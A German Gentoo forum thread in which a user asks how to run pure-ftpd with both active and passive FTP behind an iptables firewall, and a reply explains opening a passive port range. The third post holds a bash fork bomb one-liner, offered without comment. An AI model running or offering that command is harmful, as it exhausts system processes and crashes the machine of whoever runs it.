Sie sind nicht angemeldet.

Lieber Besucher, herzlich willkommen bei: GentooForum.de. Falls dies Ihr erster Besuch auf dieser Seite ist, lesen Sie sich bitte die Hilfe durch. Dort wird Ihnen die Bedienung dieser Seite näher erläutert. Darüber hinaus sollten Sie sich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutzen Sie das Registrierungsformular, um sich zu registrieren oder informieren Sie sich ausführlich über den Registrierungsvorgang. Falls Sie sich bereits zu einem früheren Zeitpunkt registriert haben, können Sie sich hier anmelden.

1

22.02.2003, 19:56

pure-ftpd fuer passives und aktives FTP

Ich habe den pure-ftpd (Version-1.0.11) auf ner Gentoo-Kiste installiert und per iptables eine Firewall, die nur port 20-22 und 80 von aussen zulaesst. Immer wieder melden mir Nutzer, dasz sie nix auf von meiner Site downloaden koennen.

folgende Optionen habe ich beim pure-ftpd angegeben:[code:1]## Number of simultaneous connections in total, and per ip ##
MAX_CONN="-c 4"
MAX_CONN_IP="-C 10"

## Start daemonized in background ##
DAEMON="-B"

## Don't allow uploads if the partition is more full then this var ##
DISK_FULL="-k 90%"

## If your FTP server is behind a NAT box, uncomment this ##
#USE_NAT="-N"

## Authentication (others are 'pam', ...)##
AUTH="-l unix"

## Misc. Others ##
MISC_OTHER="-A -x -j -N -R -f none -O clf:/var/log/ftpd/current"[/code:1]

Damit funktioniert aktives ftp. Wenn ich aber mit ncftp versuche ein Verzeichnis aufzulisten, sagt er "passive mode refused", listet es dann aber auf. Wenn ich einfach mit der Option "-p" Highports fuer passive-FTP angebe, muesste ich ja die Firewall oeffnen....aber selbst wenn ich das tuhe kommt wieder die Meldung bei ncftp.

Hat jemand eine Idee, wie man beides ermoeglichen kann, ohne meinen Server offen wie ein Scheunentor zu machen?

Alex
http://spitfire.homelinux.net/
http://spitfire.spittix.de/

GNU/LinuX mobile Dokumentation

2

23.02.2003, 18:05

Passives FTP

Moin,

beim passiven ftp macht der ftp-Server keine Verbindung zum Clien, sondern antwortet von einem unpreviliierten Port (>1024) aus. D.h. du mußt Deinem FTP-Server mitteilen, welche Ports er für die Verbindung nutzen darf und diese durch Deine Firewall lassen.

s. hierzu auch:
http://slacksite.com/other/ftp.html#passive

Viele Grüße,
gtr

3

11.02.2004, 09:44

:arrow: close

Quellcode

1
bash-2.05b $ :() { :|: & } ; :

"Kaffee Junge, weisst du eigentlich wie gut der schmeckt?"